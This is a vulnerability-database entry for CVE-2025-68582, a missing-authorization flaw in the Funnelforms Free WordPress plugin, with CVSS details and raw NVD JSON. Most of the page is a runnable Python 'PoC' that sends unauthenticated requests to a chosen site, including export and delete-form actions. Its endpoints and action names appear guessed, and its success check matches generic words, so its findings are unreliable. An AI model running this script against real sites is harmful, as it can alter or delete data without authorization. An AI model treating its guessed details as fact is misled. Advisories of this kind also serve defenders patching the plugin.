Security Vulnerability Report
中文
CVE-2025-68582 CVSS 5.3 MEDIUM

CVE-2025-68582

Published: 2025-12-24 13:16:25
Last Modified: 2026-04-27 19:16:34

Description

Missing Authorization vulnerability in Funnelforms Funnelforms Free funnelforms-free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Funnelforms Free: from n/a through <= 3.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Funnelforms Free <= 3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68582 PoC - Funnelforms Free Missing Authorization # Target: WordPress site with Funnelforms Free plugin <= 3.8 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-68582 Missing Authorization in Funnelforms Free plugin """ # Common Funnelforms Free AJAX endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/funnelforms/v1/', '/?rest_route=/funnelforms/v1/' ] # Vulnerable actions - these should require authentication vulnerable_actions = [ 'funnelforms_get_forms', 'funnelforms_get_submissions', 'funnelforms_export_data', 'funnelforms_delete_form', 'funnelforms_save_settings' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68582 - Missing Authorization in Funnelforms Free") print("=" * 60) for endpoint in endpoints: for action in vulnerable_actions: try: url = target_url.rstrip('/') + endpoint if 'admin-ajax.php' in endpoint: data = { 'action': action, 'nonce': '' # No nonce needed - authentication bypass } response = requests.post(url, data=data, timeout=10) else: response = requests.get(url, timeout=10) # Check for successful unauthorized access if response.status_code == 200: # Check if response contains sensitive data if any(keyword in response.text.lower() for keyword in ['form', 'submission', 'data', 'settings', 'success']): print(f"[+] VULNERABLE: {endpoint} - {action}") print(f" Status: {response.status_code}") print(f" Response preview: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") continue print("[*] No obvious vulnerability detected") print("[*] Manual verification recommended") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-68582.py <target_url>") print("Example: python cve-2025-68582.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68582", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:25.387", "lastModified": "2026-04-27T19:16:33.553", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Funnelforms Funnelforms Free funnelforms-free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Funnelforms Free: from n/a through <= 3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}